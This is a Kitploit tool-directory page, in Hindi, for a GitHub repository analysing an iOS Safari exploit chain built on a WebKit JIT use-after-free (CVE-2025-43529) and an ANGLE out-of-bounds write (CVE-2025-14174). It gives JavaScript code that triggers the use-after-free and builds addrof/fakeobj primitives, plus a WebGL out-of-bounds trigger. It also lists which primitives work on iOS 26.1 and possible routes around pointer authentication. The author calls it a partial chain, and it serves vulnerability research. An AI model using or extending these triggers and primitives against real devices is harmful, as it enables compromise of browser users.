Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WebKit-UAF-ANGLE-OOB-Analysis — CVE-2025-43529 (WebKit UAF) + CVE-2025-14174 (ANGLE OOB) एक्सप्लॉइट श्रृंखला का विश्लेषण - iOS Safari | Kitploit
उपकरण/GitHubGitHub/0xjohnnydev/webkit-uaf-angle-oob-analysis
आईओएस सुरक्षाभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब सुरक्षामोबाइल सुरक्षापेपर और शोधबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
0xjohnnydev/webkit-uaf-angle-oob-analysis

WebKit-UAF-ANGLE-OOB-Analysis

CVE-2025-43529 (WebKit UAF) + CVE-2025-14174 (ANGLE OOB) एक्सप्लॉइट श्रृंखला का विश्लेषण - iOS Safari

रिपॉजिटरी देखें
103211 महीना पहलेKitploit द्वारा समीक्षित

WebKit-UAF-ANGLE-OOB-Analysis (CVE-2025-43529, CVE-2025-14174)

WebKit/ANGLE श्रृंखला के लिए iOS 26.1 पर नोट्स और PoC सामग्री। यह पूर्ण एक्सप्लॉइट नहीं है; यह सत्यापित प्रिमिटिव्स को उन हिस्सों से अलग करता है जो अभी भी विफल होते हैं।

लेखक: zeroxjf
आधारित: jir4vv1t का CVE-2025-43529 एक्सप्लॉइट
स्थिति: आंशिक श्रृंखला; मनमाना R/W सिद्ध नहीं
परीक्षण डिवाइस: iPhone 11 Pro Max, iOS 26.1
अंतिम अपडेट: जनवरी 2026


दायरा और श्रेय

CVE-2025-43529 UAF ट्रिगर, बटरफ्लाई रिक्लेम, और addrof/fakeobj प्रिमिटिव्स jir4vv1t के काम पर आधारित हैं। मेरे अतिरिक्त योगदान हैं ANGLE OOB प्लंबिंग, PAC-केंद्रित विश्लेषण, और iOS 26.1 सत्यापन।

अवलोकन

दो WebKit CVE एक साथ खुलासा किए गए और Apple द्वारा इन-द-वाइल्ड उपयोग के रूप में रिपोर्ट किए गए।

CVEघटकप्रकारसारांश
CVE-2025-43529JavaScriptCoreUse-After-FreeDFG JIT में राइट बैरियर की कमी के कारण GC जीवित ऑब्जेक्ट्स को मुक्त कर देता है
CVE-2025-14174ANGLE (GPU)Out-of-Bounds WriteMetal बैकएंड स्टेजिंग बफर आवंटन के लिए गलत ऊंचाई का उपयोग करता है

CVE-2025-43529: WebKit DFG Store Barrier UAF

मूल कारण

यह बग JavaScriptCore के DFG JIT में है, विशेष रूप से Store Barrier Insertion Phase (DFGStoreBarrierInsertionPhase.cpp) में।

जब कोई Phi node escapes (बाहर निकल जाता है) लेकिन उसके Upsilon इनपुट्स escaped के रूप में चिह्नित नहीं होते, तो बाद के स्टोर्स राइट बैरियर से चूक जाते हैं। इससे GC अभी भी पहुंच योग्य ऑब्जेक्ट्स को मुक्त कर सकता है।

ट्रिगर तंत्र

root@kitploit:~
function triggerUAF(flag, k, allocCount) {
    let A = { p0: 0x41414141, p1: 1.1, p2: 2.2 };
    arr[arr_index] = A;  // A in old space

    let a = new Date(1111);
    a[0] = 1.1;  // Creates butterfly for Date

    // Force GC
    for (let j = 0; j < allocCount; ++j) {
        forGC.push(new ArrayBuffer(0x800000));
    }

    let b = { p0: 0x42424242, p1: 1.1 };

    // Phi node - the bug
    let f = b;
    if (flag) f = 1.1;

    A.p1 = f;  // Phi escapes, but 'b' NOT marked as escaped

    // Long loop = GC race window
    for (let i = 0; i < 1e6; ++i) { /* ... */ }

    b.p1 = a;  // NO WRITE BARRIER - 'a' freed while still reachable
}

एक्सप्लॉइटेशन स्केच

मुक्त किए गए Date का बटरफ्लाई स्प्रे अरेज़ द्वारा दोबारा प्राप्त किया जा सकता है, जिससे टाइप कन्फ्यूज़न पैदा होता है:

root@kitploit:~
// After reclaim:
boxed_arr[0] = obj;           // Store object reference
addr = ftoi(unboxed_arr[0]);  // Read as float64 = leaked address

unboxed_arr[0] = itof(addr);  // Write address as float64
fake = boxed_arr[0];          // Read as object = fakeobj

वर्तमान परिणाम (iPhone 11 Pro Max, iOS 26.1)

  • addrof/fakeobj: प्रोब रन में सत्यापित
  • Address leaking: प्रति रन 20+ ऑब्जेक्ट पते कैप्चर किए गए
  • Inline-storage read/write: ज्ञात इनलाइन स्लॉट्स पर सत्यापित (ऑब्जेक्ट-एड्रेस-आधारित)
  • Arbitrary R/W: सिद्ध नहीं; बैकिंग-स्टोर स्कैन प्रमाण वर्तमान रन में विफल रहता है

CVE-2025-14174: ANGLE Metal Backend OOB Write

मूल कारण

ANGLE के Metal बैकएंड (TextureMtl.cpp) में, स्टेजिंग बफर आवंटन PBO के माध्यम से अपलोड करते समय वास्तविक टेक्सचर ऊंचाई के बजाय UNPACK_IMAGE_HEIGHT का उपयोग करता है।

ट्रिगर

root@kitploit:~
gl.pixelStorei(gl.UNPACK_IMAGE_HEIGHT, 16);  // Small value

// Staging buffer: 256 * 16 * 4 = 16KB
// Actual write:   256 * 256 * 4 = 256KB
// OOB: 240KB!

gl.texImage2D(gl.TEXTURE_2D, 0, gl.DEPTH_COMPONENT32F,
              256, 256, 0, gl.DEPTH_COMPONENT, gl.FLOAT, 0);

PAC समस्या

पूर्ण एक्सप्लॉइटेशन को क्या रोक रहा है

arm64e (iPhone 11 Pro Max) पर, Pointer Authentication Codes महत्वपूर्ण JSC पॉइंटर्स की सुरक्षा करते हैं:

पॉइंटरसंरक्षितपरिणाम
TypedArray m_vectorहाँमनमाना बैकिंग स्टोर वाला TypedArray फेक नहीं किया जा सकता
JSArray butterflyहाँमनमाना बटरफ्लाई वाला JSArray फेक नहीं किया जा सकता
root@kitploit:~
Exception: EXC_BAD_ACCESS
KERN_INVALID_ADDRESS at 0x0001fffffffffffc -> 0x0000007ffffffffc
(possible pointer authentication failure)

मूल कन्फ्यूज़न क्यों काम करता है

टाइप कन्फ्यूज़न सफल होता है क्योंकि दोनों अरे वैध रूप से हस्ताक्षरित बटरफ्लाई पॉइंटर्स का उपयोग करते हैं - हम केवल उसी मेमोरी की पुनर्व्याख्या कर रहे हैं। मनमाने अहस्ताक्षरित पॉइंटर्स वाले फेक ऑब्जेक्ट्स PAC जांच पर क्रैश होते हैं।

असिद्ध बाईपास रास्ते

  1. JIT पथ जो किसी वैध ऑब्जेक्ट से हस्ताक्षरित पॉइंटर का उपयोग करते हैं, बिना हमलावर-नियंत्रित फील्ड्स को फिर से प्रमाणित किए।
  2. एक सुलभ साइनिंग गैजेट या API जो सही कॉन्टेक्स्ट के साथ नियंत्रित डेटा पॉइंटर पर हस्ताक्षर करता है।
  3. ANGLE OOB का एक अलग उपयोग जो फेक TypedArray/JSArray बैकिंग स्टोर्स को पूरी तरह से टालता है।

वर्तमान क्षमताएँ


साक्ष्य सारांश (नवीनतम प्रोब रन)

  • सत्यापित: addrof, fakeobj, एड्रेस लीक्स, ज्ञात ऑब्जेक्ट्स पर इनलाइन-स्लॉट रीड/राइट
  • असत्यापित: मनमाना read64/write64, रेंडरर→GPU एस्केप चेन, सैंडबॉक्स एस्केप
  • ANGLE प्रोब: WebGL2 PBO पथ लागू किया गया; वर्तमान रन में ट्रिगर की पुष्टि नहीं हुई

रिपॉजिटरी संरचना

root@kitploit:~
├── README.md                 # This file
├── poc/
│   └── chained_exploit_probe.html
└── analysis/
    ├── pac_analysis.md       # Detailed PAC findings
    └── crash_logs/           # Example crash reports

आभार

CVE-2025-43529 ट्रिगर, बटरफ्लाई रिक्लेम तकनीक, और addrof/fakeobj निर्माण jir4vv1t/CVE-2025-43529 पर आधारित हैं। यह रिपॉजिटरी iOS 26.1 सत्यापन, PAC नोट्स, और ANGLE OOB प्लंबिंग जोड़ती है।


संदर्भ

  • jir4vv1t/CVE-2025-43529 - मूल UAF एक्सप्लॉइट और विश्लेषण
  • WebKit Bugzilla: 302502, 303614
  • Apple सुरक्षा अपडेट - iOS 26
  • Google Threat Analysis Group

वर्तमान स्थिति: JSC प्रिमिटिव और PAC ब्लॉकर को रिप्रोड्यूस करने के लिए उपयोगी; पूर्ण एक्सप्लॉइट चेन नहीं।

टूल डाउनलोड करें
प्रिमिटिवस्थितिनोट्स
addrof(obj)कार्यशीलप्रोब में सत्यापित
fakeobj(addr)कार्यशीलज्ञात ऑब्जेक्ट्स के विरुद्ध सत्यापित
Address leakingकार्यशीलप्रति रन 20+ पते
Inline slot read/writeकार्यशीलज्ञात इनलाइन स्लॉट्स पर सत्यापित (ऑब्जेक्ट-एड्रेस-आधारित)
read64(addr)असत्यापितइनलाइन-स्लॉट ट्रिक के माध्यम से निर्मित, प्रमाण विफल रहा
write64(addr)असत्यापितइनलाइन-स्लॉट ट्रिक के माध्यम से निर्मित, प्रमाण विफल रहा